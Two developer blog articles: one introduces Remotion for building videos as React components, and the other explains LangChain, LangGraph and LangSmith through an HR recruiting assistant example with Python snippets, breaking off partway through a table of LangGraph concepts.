<article>
<h1>Remotion: When React Becomes a Video Tool</h1>
<p>P.V.H — Thu, 02 Jul 2026 11:01:02 GMT</p>
<p>When it comes to video editing, most of us think of software such as Premiere Pro, After Effects, DaVinci Resolve, or CapCut. These tools all follow the same familiar model: drag and drop, edit on a timeline, then export.</p>
<p>In recent years, however, a very different approach has been gaining popularity among developers: writing videos in code.</p>
<p>Instead of working with the mouse, you describe the whole video as React components and let a program render it into a finished video.</p>
<p>The best-known framework for this approach is Remotion.</p>
<hr><h1>What is Remotion?</h1>
<p>Remotion is a framework for building videos with React, TypeScript, HTML, and CSS. Its source code is public on GitHub, but it is not licensed as conventional open source: individuals and small teams can use it for free, while larger companies need a paid company license.</p>
<p>Instead of the timeline used by traditional editors, Remotion treats every video as a React application.</p>
<p>You can bring all of your familiar web development knowledge:</p>
<ul><li>React components</li><li>Props</li><li>State</li><li>Tailwind CSS</li><li>SVG</li><li>Canvas</li><li>Animation</li><li>npm packages</li></ul>
<p>to building videos.</p>
<p>When you are done, Remotion renders the result to formats such as:</p>
<ul><li>MP4</li><li>GIF</li><li>PNG sequence</li><li>WebM</li></ul>
<p>in high quality.</p>
<hr><h1>The biggest difference: a video is just a React component</h1>
<p>If you have written React before, the following code will look familiar.</p>
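<pre><code class="language-tsx">import { AbsoluteFill } from "remotion";

// Subtitle and Avatar are ordinary React components defined elsewhere in the project.
export const MyVideo = () => {
  return (
    &lt;AbsoluteFill&gt;
      &lt;Subtitle /&gt;
      &lt;Avatar /&gt;
    &lt;/AbsoluteFill&gt;
  );
};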
</code></pre><p>There is no timeline or layer panel to arrange by hand, as there is in Premiere.</p><p>Each element of the video is simply a React component.</p><p>For example, elements such as:</p><ul><li>Logo</li><li>Title</li><li>Background</li><li>Chart</li><li>Subtitles</li><li>Avatar</li></ul><p>can all be reused just like components in a web application.</p><p>This makes it possible to build component libraries dedicated to video, much as we build a design system for web interfaces.</p><hr><h1 id="remotion-render-video-nh-th-n-o">How does Remotion render video?</h1><p>This is the most interesting part of Remotion.</p><p>A video is really just a sequence of images shown in rapid succession.</p><p>For example:</p><ul><li>30 FPS means 30 images per second</li><li>60 FPS means 60 images per second</li></ul><p>A 10-second video at 30 FPS therefore consists of:</p><pre><code>30 × 10 = 300 frames
</code></pre><p>Remotion does not think in terms of "time" but in terms of <strong>frames</strong>.</p><p>Whenever it renders, Remotion knows exactly which frame it is on:</p><pre><code class="language-tsx">import { useCurrentFrame } from "remotion";

// Inside a component rendered by Remotion:
const frame = useCurrentFrame();
</code></pre><p>For the 300-frame video above, its value runs from:</p><pre><code>0
1
2
...
299
</code></pre><p>React then renders the component for the current frame value.</p><p>Put simply:</p><pre><code>React(frame = 0)
↓

Frame 0

React(frame = 1)
↓

Frame 1

React(frame = 2)
↓

Frame 2
</code></pre><p>Once every frame has been rendered, Remotion stitches them together into a video.</p><hr><h1 id="m-i-animation-u-c-t-nh-to-n-t-frame">Every animation is computed from the frame</h1><p>Suppose you want a piece of text to slide from right to left over 2 seconds.</p><p>If the video runs at 30 FPS, then:</p><pre><code>2 seconds × 30 FPS = 60 frames
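</code></pre><p>Remotion provides the <code>interpolate</code> function for this.</p><pre><code class="language-tsx">import { interpolate, useCurrentFrame } from "remotion";

const frame = useCurrentFrame();

// Map frames 0..60 to x positions 800..0 (pixels).
// extrapolateRight: "clamp" keeps x at 0 after frame 60
// instead of letting the text keep moving left.
const x = interpolate(
    frame,
    [0, 60],
    [800, 0],
    { extrapolateRight: "clamp" }
);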
</code></pre><p>In other words:</p><!--kg-card-begin: html--><table>
<thead>
<tr>
<th>Frame</th>
<th>Position (x)</th>
</tr>
</thead>
<tbody>
<tr>
<td>0</td>
<td>800 px</td>
</tr>
<tr>
<td>30</td>
<td>400 px</td>
</tr>
<tr>
<td>60</td>
<td>0 px</td>
</tr>
</tbody>
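</table><!--kg-card-end: html--><p>You do not have to compute each frame yourself.</p><p>Remotion fills in the intermediate values (linearly, by default) to produce smooth motion.</p><p>Because every animation is derived from the frame number, effects such as:</p><ul><li>Fade In</li><li>Fade Out</li><li>Zoom</li><li>Rotate</li><li>Scale</li><li>Motion Graphics</li></ul><p>are all straightforward to express.</p><hr><h1 id="sequence-timeline-b-ng-code">Sequence – Timeline in code</h1><p>In Premiere, you drag clips onto a timeline.</p><p>In Remotion, the timeline is described in React.</p><pre><code class="language-tsx">import { AbsoluteFill, Sequence } from "remotion";

// Intro, Content and Ending are components defined elsewhere.
// Without durationInFrames, a Sequence lasts until the end of the composition,
// so each scene gets an explicit length to avoid overlapping the next one.
export const Timeline = () => (
  &lt;AbsoluteFill&gt;
    &lt;Sequence from={0} durationInFrames={90}&gt;
      &lt;Intro /&gt;
    &lt;/Sequence&gt;
    &lt;Sequence from={90} durationInFrames={210}&gt;
      &lt;Content /&gt;
    &lt;/Sequence&gt;
    &lt;Sequence from={300}&gt;
      &lt;Ending /&gt;
    &lt;/Sequence&gt;
  &lt;/AbsoluteFill&gt;
);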
</code></pre><p>The code above means:</p><ul><li>Intro starts at frame 0</li><li>Content starts at frame 90 (3 seconds in, at 30 FPS)</li><li>Ending starts at frame 300 (10 seconds in)</li></ul><p>The entire timeline is managed in code.</p><p>This brings major advantages:</p><ul><li>You can use loops to generate many scenes.</li><li>You can show scenes based on data from an API.</li><li>You can produce videos of different lengths just by changing the input data.</li></ul><hr><h1 id="render-video-ph-a-sau-di-n-ra-nh-th-n-o">What happens behind the scenes during rendering?</h1><p>Contrary to what many people assume, Remotion does not screen-record a browser.</p><p>The rendering process works like this:</p><pre><code>React Components
        │
        ▼
Headless Chrome
        │
        ▼
Render each frame
        │
        ▼
Frame images (PNG or JPEG)
        │
        ▼
FFmpeg
        │
        ▼
MP4
</code></pre><p>In other words:</p><ol><li>Remotion launches a headless Chrome browser in the background.</li><li>It renders each frame just as it would render a web page.</li><li>It captures each frame as an image.</li><li>It uses FFmpeg to combine all the images into an MP4 video.</li></ol><p>As a result, Remotion can reliably render video in:</p><ul><li>Full HD</li><li>2K</li><li>4K</li><li>60 FPS</li></ul><hr><h1 id="v-sao-react-l-i-ph-h-p-t-o-video">Why is React a good fit for video?</h1><p>At first glance, React is a library for building user interfaces.</p><p>But look closely and a video is also a collection of UI elements:</p><ul><li>Text</li><li>Images</li><li>Icons</li><li>Charts</li><li>Avatars</li><li>Waveforms</li><li>Subtitles</li></ul><p>Each element has:</p><ul><li>A position</li><li>A size</li><li>An animation</li><li>A time at which it appears</li></ul><p>These are exactly the things React handles well.</p><p>Building on the React ecosystem lets developers reuse many existing libraries, such as:</p><ul><li>Tailwind CSS</li><li>Framer Motion</li><li>D3.js</li><li>Chart.js</li><li>Three.js</li><li>SVG Animation</li></ul><p>to create modern-looking videos without learning a new editing tool. One caveat: animations must be driven by the current frame. Libraries that animate in real time, such as Framer Motion transitions, Chart.js's built-in animations, or CSS transitions, need to be disabled or adapted; otherwise rendered frames can flicker or come out inconsistent.</p><hr><h1 id="k-nguy-n-ai-agent-t-vi-t-code-sang-t-o-video-b-ng-prompt">The AI agent era: from writing code to creating video with prompts</h1><p>Remotion was originally aimed at developers.</p><p>To make a video, you had to write every React component yourself.</p><p>Today, with the rise of AI agents, the developer's role is gradually changing.</p><p>Instead of writing every line of code, you can simply state a request:</p><blockquote>"Create a 1-minute product introduction video with a female voiceover, subtitles, and illustrations."</blockquote><p>An AI agent can then handle steps such as:</p><ul><li>Writing the script.</li><li>Splitting it into scenes.</li><li>Generating React code for Remotion.</li><li>Creating the voiceover with ElevenLabs or OpenAI TTS.</li><li>Finding or generating images.</li><li>Assembling everything into a finished video.</li></ul><p>Remotion acts as the <strong>video rendering engine</strong>, while the AI is responsible for the video's content and structure.</p><hr><h1 id="m-t-pipeline-t-o-video-b-ng-ai">An AI video-generation pipeline</h1><p>A common workflow today looks like this:</p><pre><code>User prompt
          │
          ▼
OpenAI / Gemini / Claude
          │
          ▼
Script + JSON describing each scene
          │
          ▼
ElevenLabs or OpenAI TTS
          │
          ▼
Voiceover audio file
          │
          ▼
Remotion
          │
          ▼
Render MP4
</code></pre><p>Instead of editing each video by hand, the whole process can be automated, producing hundreds or thousands of videos from input data alone.</p><hr><h1 id="khi-n-o-n-n-s-d-ng-remotion">When should you use Remotion?</h1><p>Remotion is especially well suited to producing videos in bulk or generating videos from data:</p><ul><li>Automated AI-generated videos.</li><li>News videos.</li><li>TikTok or YouTube Shorts videos.</li><li>Personalized advertising videos.</li><li>Data report videos.</li><li>Internal training videos.</li><li>Product introduction videos.</li><li>Videos generated from CMS content.</li></ul><p>On the other hand, if the goal is editing a film, a music video, or any project that needs hands-on editing with many cinematic effects, software such as Premiere Pro or DaVinci Resolve is still the better choice.</p><hr><h1 id="k-t-lu-n">Conclusion</h1><p>Remotion is not just a library for making videos with React; it also represents a new way of thinking: <strong>treating video as a software product that can be programmed, reused, and automated</strong>.</p><p>Combined with AI agents and large language models (LLMs), Remotion becomes a powerful foundation for automated video-generation systems, from marketing and training videos to personalized content at scale.</p><p>For developers, learning Remotion not only extends their skills into multimedia, but also opens the door to building AI video-generation applications, a field that has grown very quickly in recent years.</p><hr><h1 id="tham-kh-o">References</h1><ul><li><a href="https://www.remotion.dev/">https://www.remotion.dev/</a></li><li><a href="https://github.com/remotion-dev/remotion">https://github.com/remotion-dev/remotion</a></li><li><a href="https://www.remotion.dev/showcase">https://www.remotion.dev/showcase</a></li></ul>
</article>
<article>
<h1>LangChain, LangGraph, LangSmith: Understanding Them by Building an AI Tool for HR</h1>
<p>D.T.H.L — Mon, 29 Jun 2026 10:42:16 GMT</p>
<!--kg-card-begin: markdown-->
<blockquote>
<p>This article explains <strong>LangChain</strong>, <strong>LangGraph</strong>, and <strong>LangSmith</strong> in a down-to-earth, easy-to-picture way, while still going deep enough for developers who want to build real AI agents. The running example is a tool called <strong>HR Copilot</strong>, an AI assistant that helps the HR team find candidates, score CVs, draft emails, and track the hiring process.</p>
</blockquote>
<hr>
<h4 id="muvsaochgillmlcha">Introduction: why calling an LLM alone is not enough</h4>
<p>Suppose you want to build an AI tool for the HR team.</p>
<p>HR types in a perfectly natural request:</p>
<pre><code class="language-text">Find me suitable candidates for the Senior Backend Go Developer position,
prioritizing AWS, MySQL, and Japanese N2. If they fit, draft an interview invitation email.
</code></pre>
<p>At first glance, it looks like an ordinary question you could paste into ChatGPT. But to turn it into <strong>a real product</strong>, the tool has to do far more:</p>
<ul>
<li>understand which position HR wants to fill,</li>
<li>fetch the relevant JD (job description),</li>
<li>search for CVs in the database or CV archive,</li>
<li>read and score each candidate,</li>
<li>explain why a candidate is a good fit,</li>
<li>draft an interview invitation email,</li>
<li>pause for HR to review before sending,</li>
<li>update the candidate's status in the pipeline,</li>
<li>and log the entire process so it can be debugged when the AI gets something wrong.</li>
</ul>
<p>In other words, this is no longer a matter of “calling a model and getting an answer”. It is an <strong>AI workflow</strong> with multiple steps, real data, real tools, permissions, human approval, and a need to monitor quality.</p>
<p>That is where the trio <strong>LangChain, LangGraph, and LangSmith</strong> becomes useful.</p>
<hr>
<h4 id="1bacngcnykhcnhauthno">1. How do these three tools differ?</h4>
<p>Imagine we are building a small “factory” to support HR recruiting.</p>
<ul>
<li><strong>LangChain</strong> is like the machine parts: a CV reader, an LLM caller, a data finder, a JSON emitter.</li>
<li><strong>LangGraph</strong> is like the assembly line: which step runs first, when to branch, when to stop and wait for HR approval.</li>
<li><strong>LangSmith</strong> is like the control room: which steps the agent went through, where it went wrong, how much it cost, and where it was slow.</li>
</ul>
<p>In short:</p>
<pre><code class="language-text">LangChain  = the AI knows how to use tools.
LangGraph  = the AI works according to a process.
LangSmith  = the team can see what the AI did and where it went wrong.
</code></pre>
<p>Or, from a technical perspective:</p>
<table>
<thead>
<tr>
<th>Tool</th>
<th>Main role</th>
<th>Example in HR Copilot</th>
</tr>
</thead>
<tbody>
<tr>
<td><strong>LangChain</strong></td>
<td>Connects the LLM with prompts, tools, retrievers, and output parsers</td>
<td>Score a CV against a JD and return JSON</td>
</tr>
<tr>
<td><strong>LangGraph</strong></td>
<td>Orchestrates stateful workflows with branches, loops, and human approval</td>
<td>Find CVs → score → draft email → wait for HR approval → send</td>
</tr>
<tr>
<td><strong>LangSmith</strong></td>
<td>Trace, debug, evaluation, monitoring</td>
<td>See why the AI picked candidate A over B</td>
</tr>
</tbody>
</table>
<p>Another way to remember it:</p>
<pre><code class="language-text">LangChain  = capability
LangGraph  = process
LangSmith  = trust
</code></pre>
<hr>
<h4 id="2trckhiisuaiagentlg">2. Before diving in: what is an AI agent?</h4>
<p>A regular chatbot usually works like this:</p>
<pre><code class="language-text">User asks → LLM answers
</code></pre>
<p>An AI agent is different. It does not just answer; it can <strong>decide its own next step</strong> and <strong>call external tools</strong>.</p>
<p>For example, with HR Copilot:</p>
<pre><code class="language-text">HR asks to find candidates
→ Agent understands the request
→ Agent calls a tool to fetch the JD
→ Agent calls a tool to search CVs
→ Agent reads the CVs
→ Agent scores them
→ Agent drafts an email
→ Agent pauses to wait for HR approval
</code></pre>
<p>An agent typically has three parts:</p>
<table>
<thead>
<tr>
<th>Part</th>
<th>In plain terms</th>
<th>HR example</th>
</tr>
</thead>
<tbody>
<tr>
<td><strong>Brain</strong></td>
<td>The LLM reasons and decides</td>
<td>“This candidate lacks AWS, so the score is lower”</td>
</tr>
<tr>
<td><strong>Senses</strong></td>
<td>Reads data, finds documents, retrieves information</td>
<td>Search JDs, read CVs, fetch candidate notes</td>
</tr>
<tr>
<td><strong>Hands</strong></td>
<td>Calls tools/APIs to take action</td>
<td>Send emails, update the ATS, post to Slack</td>
</tr>
</tbody>
</table>
<p>Many modern agents are influenced by the <strong>ReAct</strong> (Reasoning + Acting) idea:</p>
<pre><code class="language-text">Think → Act → Observe the result → Think again → ... → Answer
</code></pre>
<p>In the HR example:</p>
<pre><code class="language-text">Think: I need to find Backend Go candidates.
Act: call search_candidates().
Observe: 10 CVs found.
Think again: I need to score them on AWS, MySQL, and Japanese.
Next action: call score_candidate().
</code></pre>
<p>For simple tasks, this loop can be written in ordinary code. But once the workflow has many steps and branches, pauses for human approval, and has to resume hours or days later, a hand-written <code>while</code> loop gets messy very quickly. That is why LangGraph exists.</p>
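<p>To make the "ordinary code" version concrete, here is a minimal, framework-free sketch of a ReAct-style loop. It illustrates the idea only and is not how LangChain or LangGraph implement agents. <code>fake_llm_decide</code> is a hypothetical stand-in for the model's "think" step; a real agent would ask the LLM which tool to call next. <code>search_candidates</code> and <code>score_candidate</code> are hypothetical stubs that return canned data.</p>

```python
from typing import Callable

# Hypothetical tool stubs standing in for real HR APIs.
def search_candidates(skills: list[str]) -> list[str]:
    return ["C001", "C002"]

def score_candidate(candidate_id: str) -> int:
    return {"C001": 82, "C002": 55}.get(candidate_id, 0)

TOOLS: dict[str, Callable] = {
    "search_candidates": search_candidates,
    "score_candidate": score_candidate,
}

def fake_llm_decide(observations: list) -> dict:
    """Stand-in for the LLM 'think' step: pick the next action from what was observed."""
    if not observations:
        return {"action": "search_candidates", "args": {"skills": ["Go", "AWS", "MySQL"]}}
    candidates = observations[0]
    scored = len(observations) - 1
    if scored < len(candidates):
        return {"action": "score_candidate", "args": {"candidate_id": candidates[scored]}}
    return {"action": "finish", "args": {}}

def react_loop(max_steps: int = 10) -> dict[str, int]:
    observations: list = []
    for _ in range(max_steps):                # hard cap so the loop cannot run forever
        step = fake_llm_decide(observations)  # Think
        if step["action"] == "finish":
            break
        result = TOOLS[step["action"]](**step["args"])  # Act
        observations.append(result)                      # Observe
    candidates = observations[0] if observations else []
    return dict(zip(candidates, observations[1:]))
```

<p>Even this toy needs a hard step limit and hand-written bookkeeping of observations. The rest of this article hands the harder parts to LangGraph: branches, a pause for HR approval, and resuming days later.</p>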
<hr>
<h3 id="phnihiubacngcquabitonhr">PART I: UNDERSTANDING THE THREE TOOLS THROUGH THE HR PROBLEM</h3>
<hr>
<h4 id="3langchainbnghnillmvithgiibnngoi">3. LangChain: the toolkit for connecting LLMs to the outside world</h4>
<p>If you only need to do something very simple, you may not need LangChain.</p>
<p>For example:</p>
<pre><code class="language-text">Summarize this CV in 5 lines.
</code></pre>
<p>In that case, calling the OpenAI / Anthropic / Gemini API directly works fine.</p>
<p>But HR Copilot is not that simple. It needs many pieces:</p>
<ul>
<li>a prompt to instruct the model,</li>
<li>a model to do the reasoning,</li>
<li>tools to query the candidate database,</li>
<li>a retriever to find relevant CVs or policies,</li>
<li>an output parser to return results as JSON,</li>
<li>streaming, retries, fallbacks, and batching when running in production.</li>
</ul>
<p>LangChain standardizes these pieces so we can connect them into a pipeline.</p>
<pre><code class="language-text">JD + CV
→ Evaluation prompt
→ LLM
→ Structured Output
→ Backend stores the result
</code></pre>
<h5 id="31langchaingiiquytpaing">3.1 What pain does LangChain solve?</h5>
<p>When first experimenting with AI, we often write something like:</p>
<pre><code class="language-python">response = client.chat.completions.create(...)
</code></pre>
<p>That works for a small demo. But as the app grows, you run into questions like:</p>
<ul>
<li>What if you want to switch models from GPT to Claude?</li>
<li>How do you manage prompts with many variables?</li>
<li>How do you make the LLM return JSON that matches a schema?</li>
<li>How do you let the LLM call tools such as <code>search_candidates()</code>?</li>
<li>How do you plug in RAG so answers are grounded in real data?</li>
<li>How do you stream results, retry on errors, and fall back when a model fails?</li>
</ul>
<p>LangChain does not build the whole product for you. It gives you <strong>a standardized set of components</strong> so you can build faster and more cleanly.</p>
<h5 id="32ccmnhghpquantrngtronglangchain">3.2 Key building blocks in LangChain</h5>
<h6 id="model">Model</h6>
<p>The model is the LLM you use: GPT, Claude, Gemini, a local Llama...</p>
<pre><code class="language-python">from langchain_anthropic import ChatAnthropic

llm = ChatAnthropic(model="claude-opus-4-8")
result = llm.invoke("Summarize this CV in 5 bullet points")
</code></pre>
<p>The nice part is that switching providers affects the rest of the pipeline much less than it would if raw API calls were scattered across many places.</p>
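<p>That benefit comes from coding against a shared interface. The sketch below imitates the idea without any library, using a <code>typing.Protocol</code>. <code>ChatModel</code>, <code>FakeClaude</code>, <code>FakeGPT</code>, and <code>summarize_cv</code> are hypothetical names for illustration, not LangChain classes, and the "providers" simply echo the prompt instead of calling an API.</p>

```python
from typing import Protocol

class ChatModel(Protocol):
    """Any object with an invoke(prompt) -> str method counts as a chat model."""
    def invoke(self, prompt: str) -> str: ...

# Hypothetical providers: a real one would call its vendor's API here.
class FakeClaude:
    def invoke(self, prompt: str) -> str:
        return f"[claude] {prompt}"

class FakeGPT:
    def invoke(self, prompt: str) -> str:
        return f"[gpt] {prompt}"

def summarize_cv(llm: ChatModel, cv_text: str) -> str:
    # The pipeline depends only on the interface, never on a concrete provider.
    return llm.invoke(f"Summarize this CV in 5 bullet points:\n{cv_text}")

# Switching providers is a one-line change at the call site.
claude_summary = summarize_cv(FakeClaude(), "5 years of Go, AWS, MySQL")
gpt_summary = summarize_cv(FakeGPT(), "5 years of Go, AWS, MySQL")
```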
<h6 id="prompttemplate">Prompt Template</h6>
<p>A prompt template lets you write prompts with variables that are easy to reuse and test.</p>
<pre><code class="language-python">from langchain_core.prompts import ChatPromptTemplate

prompt = ChatPromptTemplate.from_messages([
    ("system", "You are an HR specialist with experience recruiting for IT roles."),
    ("user", "Evaluate the following CV against the JD.\n\nCV:\n{cv}\n\nJD:\n{jd}")
])
</code></pre>
<p>Instead of concatenating strings by hand in many places, you get one clear template.</p>
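<p>To show what a template buys you, here is a rough pure-Python stand-in: a list of <code>(role, text)</code> pairs whose <code>{placeholders}</code> are filled by <code>str.format</code>. <code>TEMPLATE</code> and <code>render_messages</code> are hypothetical names. LangChain's real <code>ChatPromptTemplate</code> does more, including message types, partial variables, and validation.</p>

```python
TEMPLATE = [
    ("system", "You are an HR specialist with experience recruiting for IT roles."),
    ("user", "Evaluate the following CV against the JD.\n\nCV:\n{cv}\n\nJD:\n{jd}"),
]

def render_messages(template: list[tuple[str, str]], **variables: str) -> list[tuple[str, str]]:
    """Fill the {placeholders} in every message; a missing variable raises KeyError early."""
    return [(role, text.format(**variables)) for role, text in template]

messages = render_messages(TEMPLATE, cv="5 years of Go", jd="Senior Backend Go")
```

<p>As with LangChain's default f-string templates, a literal brace in the template text (for example, a JSON sample) must be doubled as <code>{{</code> / <code>}}</code>. Braces inside the substituted CV text need no escaping.</p>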
<h6 id="structuredoutput">Structured Output</h6>
<p>In a real app, free-form text is hard to process.</p>
<p>For example, a free-form output:</p>
<pre><code class="language-text">This candidate is a fairly good fit; we could invite them to an interview.
</code></pre>
<p>The backend cannot easily tell what the score is, what the decision is, or which skills are missing.</p>
<p>A better output:</p>
<pre><code class="language-json">{
  "match_score": 82,
  "decision": "interview",
  "strengths": ["Go", "AWS", "MySQL"],
  "risks": ["Leadership experience is unclear"]
}
</code></pre>
<p>Structured output makes the AI return data with a well-defined shape that the backend can use directly.</p>
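<p>The backend should still verify what comes back. Here is a minimal standard-library sketch of that check, assuming the field names from the JSON above. The extra decision values <code>"hold"</code> and <code>"reject"</code>, the <code>CandidateScore</code> dataclass, and <code>parse_candidate_score</code> are hypothetical. In LangChain, this role is usually played by a Pydantic schema passed to <code>with_structured_output</code>, as in section 3.3.</p>

```python
import json
from dataclasses import dataclass

ALLOWED_DECISIONS = {"interview", "hold", "reject"}  # hypothetical allowed values

@dataclass
class CandidateScore:
    match_score: int
    decision: str
    strengths: list[str]
    risks: list[str]

def parse_candidate_score(raw: str) -> CandidateScore:
    """Parse the model's JSON output and reject anything that breaks the schema."""
    data = json.loads(raw)          # raises json.JSONDecodeError (a ValueError) on bad JSON
    score = CandidateScore(**data)  # raises TypeError on missing or unexpected keys
    if not isinstance(score.match_score, int) or not 0 <= score.match_score <= 100:
        raise ValueError("match_score must be an integer in [0, 100]")
    if score.decision not in ALLOWED_DECISIONS:
        raise ValueError(f"unknown decision: {score.decision!r}")
    return score
```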
<h6 id="tool">Tool</h6>
<p>A tool is a function/API that the agent can call.</p>
<p>For example:</p>
<pre><code class="language-text">search_candidates(skills=["Go", "AWS"], language="N2")
get_candidate_cv(candidate_id="C001")
send_email(to, subject, body)
update_pipeline_status(candidate_id, status)
</code></pre>
<p>The LLM does not know your company's internal databases on its own. Tools are the bridge that lets it reach real data.</p>
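<p>Mechanically, a tool call is just structured data that names a function and its arguments; your own code then executes it. Below is a framework-free sketch of that dispatch step. The registry, the <code>tool</code> decorator, <code>execute_tool_call</code>, and both stubbed tools are hypothetical. LangChain provides its own <code>@tool</code> decorator in <code>langchain_core.tools</code>, and each model provider emits tool calls in its own format.</p>

```python
import json
from typing import Callable, Optional

TOOL_REGISTRY: dict[str, Callable] = {}

def tool(fn: Callable) -> Callable:
    """Register a function so the agent can call it by name."""
    TOOL_REGISTRY[fn.__name__] = fn
    return fn

@tool
def search_candidates(skills: list[str], language: Optional[str] = None) -> list[str]:
    # Stub: a real implementation would query the candidate database.
    return ["C001"] if "Go" in skills else []

@tool
def update_pipeline_status(candidate_id: str, status: str) -> str:
    # Stub: a real implementation would update the ATS.
    return f"{candidate_id} -> {status}"

def execute_tool_call(call_json: str):
    """Run a tool call emitted by the model, shaped like {"name": ..., "args": {...}}."""
    call = json.loads(call_json)
    if call["name"] not in TOOL_REGISTRY:
        raise ValueError(f"model requested unknown tool {call['name']!r}")
    return TOOL_REGISTRY[call["name"]](**call["args"])
```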
<h6 id="retrieverrag">Retriever / RAG</h6>
<p>RAG (Retrieval-Augmented Generation) is the pattern:</p>
<pre><code class="language-text">Question
→ Find relevant documents
→ Put the documents into the prompt
→ The LLM answers based on those documents
</code></pre>
<p>In HR Copilot, RAG can be used to find:</p>
<ul>
<li>relevant JDs,</li>
<li>past CVs,</li>
<li>recruiting policies,</li>
<li>salary bands,</li>
<li>interview guidelines,</li>
<li>a candidate's history notes.</li>
</ul>
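<p>A toy version of the retrieval step shows the shape of the pattern: rank documents by how many words they share with the question, then put the best matches into the prompt. Real systems usually rely on embeddings and a vector store. The word-overlap scoring, the <code>DOCS</code> sample data, and the helper names here are simplifications for illustration.</p>

```python
import re

# Hypothetical sample documents keyed by id.
DOCS = {
    "jd_go": "Senior Backend Go Developer: Go, AWS, MySQL, Japanese N2",
    "jd_java": "Java Developer: Java, Spring, PostgreSQL",
    "policy": "Interview policy: every offer email must be approved by HR",
}

def tokenize(text: str) -> set[str]:
    return set(re.findall(r"\w+", text.lower()))

def retrieve(question: str, k: int = 2) -> list[str]:
    """Return the ids of the k documents sharing the most words with the question."""
    q = tokenize(question)
    ranked = sorted(DOCS, key=lambda doc_id: len(q & tokenize(DOCS[doc_id])), reverse=True)
    return ranked[:k]

def build_prompt(question: str) -> str:
    # Retrieved documents go into the prompt so the LLM answers from them.
    context = "\n".join(DOCS[doc_id] for doc_id in retrieve(question))
    return f"Answer using only this context:\n{context}\n\nQuestion: {question}"
```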
<h6 id="chain">Chain</h6>
<p>A chain is a linear pipeline.</p>
<pre><code class="language-python">chain = prompt | llm | output_parser
result = chain.invoke({"cv": cv_text, "jd": jd_text})
</code></pre>
<p>The mental model is simple:</p>
<pre><code class="language-text">Input → Prompt → Model → Parser → Output
</code></pre>
<p>Chains are a great fit for single-path tasks: summarizing, classifying, extracting information, and scoring against a schema.</p>
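<p>The <code>|</code> syntax is LangChain's own (the LangChain Expression Language). To show the idea without the library, here is a minimal hypothetical <code>Step</code> class that overloads <code>__or__</code> so steps compose left to right. The three steps stand in for a prompt, a model, and a parser; <code>fake_llm</code> just returns a fixed JSON string.</p>

```python
import json
from typing import Any, Callable

class Step:
    """A tiny stand-in for a runnable: wraps a function and composes with |."""
    def __init__(self, fn: Callable[[Any], Any]):
        self.fn = fn

    def __or__(self, other: "Step") -> "Step":
        # (a | b).invoke(x) == b.invoke(a.invoke(x))
        return Step(lambda x: other.fn(self.fn(x)))

    def invoke(self, x: Any) -> Any:
        return self.fn(x)

prompt = Step(lambda d: f"Score this CV against the JD. CV: {d['cv']} JD: {d['jd']}")
fake_llm = Step(lambda text: '{"match_score": 82}')  # pretends to call a model
parser = Step(json.loads)                            # turns the raw text into a dict

chain = prompt | fake_llm | parser
```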
<h5 id="33vdlangchaintronghrcopilot">3.3 LangChain example in HR Copilot</h5>
<p>Scoring a CV against a JD:</p>
<pre><code class="language-python">from typing import Literal

from langchain_anthropic import ChatAnthropic
from langchain_core.prompts import ChatPromptTemplate
from pydantic import BaseModel, Field

class CandidateScore(BaseModel):
    candidate_name: str
    match_score: int = Field(ge=0, le=100)
    level: str
    strengths: list[str]
    risks: list[str]
    # Literal restricts the model to exactly these three values
    recommendation: Literal["move_to_interview", "hold", "reject"]

prompt = ChatPromptTemplate.from_messages([
    ("system", "You are an HR specialist recruiting for IT roles. Return the result using the schema."),
    ("user", "Evaluate the following CV against the JD.\n\nCV:\n{cv}\n\nJD:\n{jd}")
])

llm = ChatAnthropic(model="claude-opus-4-8").with_structured_output(CandidateScore)
chain = prompt | llm

# cv_text and jd_text hold the CV and JD contents as plain strings, loaded elsewhere
result = chain.invoke({"cv": cv_text, "jd": jd_text})  # a CandidateScore instance
</code></pre>
<p>Expected output:</p>
<pre><code class="language-json">{
  "candidate_name": "Nguyen Van A",
  "match_score": 82,
  "level": "middle",
  "strengths": ["Go backend", "AWS", "MySQL"],
  "risks": ["No clear evidence of leadership experience"],
  "recommendation": "move_to_interview"
}
</code></pre>
<h5 id="34khinochcnlangchain">3.4 When is LangChain alone enough?</h5>
<p>LangChain is enough while the workflow is still simple:</p>
<table>
<thead>
<tr>
<th>Task</th>
<th>Need LangGraph?</th>
</tr>
</thead>
<tbody>
<tr>
<td>Upload CV → JSON summary</td>
<td>Not yet</td>
</tr>
<tr>
<td>CV + JD → score</td>
<td>Not yet</td>
</tr>
<tr>
<td>Recruiting-policy Q&amp;A with RAG</td>
<td>Not yet</td>
</tr>
<tr>
<td>Draft an email from a template</td>
<td>Not yet</td>
</tr>
</tbody>
</table>
<p>But once there are multiple steps, branches, approvals, retries, and resumption, LangChain on its own starts to fall short. That is when we need LangGraph.</p>
<hr>
<h4 id="4langgraphkhiagentkhngthchytheomtngthng">4. LangGraph: when an agent cannot run in a straight line</h4>
<p>LangChain is great for assembling pipelines. But recruiting does not always follow a straight line.</p>
<p>A real workflow might look like this:</p>
<pre><code class="language-text">Find CVs
→ If no suitable candidates: ask HR whether to relax the criteria
→ If there are good candidates: draft an email
→ Before sending: wait for HR approval
→ If HR asks for changes: go back to drafting
→ If HR approves: send the email and update the status
</code></pre>
<p>This workflow has:</p>
<ul>
<li>multiple steps,</li>
<li>multiple branches,</li>
<li>state that must be kept,</li>
<li>loops,</li>
<li>a step that waits for a human,</li>
<li>the ability to pause and resume later.</li>
</ul>
<p>LangGraph lets us model that workflow as a graph.</p>
<pre><code class="language-text">LangGraph turns an agent from “a clever prompt”
into “a controlled process”.
</code></pre>
<h5 id="41cckhinimchnhtronglanggraph">4.1 Key concepts in LangGraph</h5>
<table>
<thead>
<tr>
<th>Concept</th>
<th>In plain terms</th>
<th>HR example</th>
</tr>
</thead>
<tbody>
<tr>
<td><strong>State</strong></td>
<td>Data shared across the workflow</td>
<td>JD, CV list, scores, email draft</td>
</tr>
<tr>
<td><strong>Node</strong></td>
<td>A single processing step</td>
<td><code>search_candidates</code>, <code>score_candidates</code></td>
</tr>
<tr>
<td><strong>Edge</strong></td>
<td>A connection between steps</td>
<td><code>search</code> → <code>score</code></td>
</tr>
<tr>
<td><strong>Conditional Edge</strong></td>
<td>Branches based on a condition</td>
<td>High score → draft email; no CVs → ask HR again</td>
</tr>
<tr>
<td><strong>Checkpoint</strong></td>
<td>Saves state so the run can resume</td>
<td>Pause while waiting for HR to approve the email</td>
</tr>
<tr>
<td><strong>Interrupt</strong></td>
<td>Pauses the workflow for human input</td>
<td>HR clicks Approve / Revise / Reject</td>
</tr>
<tr>
<td><strong>Subgraph</strong></td>
<td>A small graph inside a larger one</td>
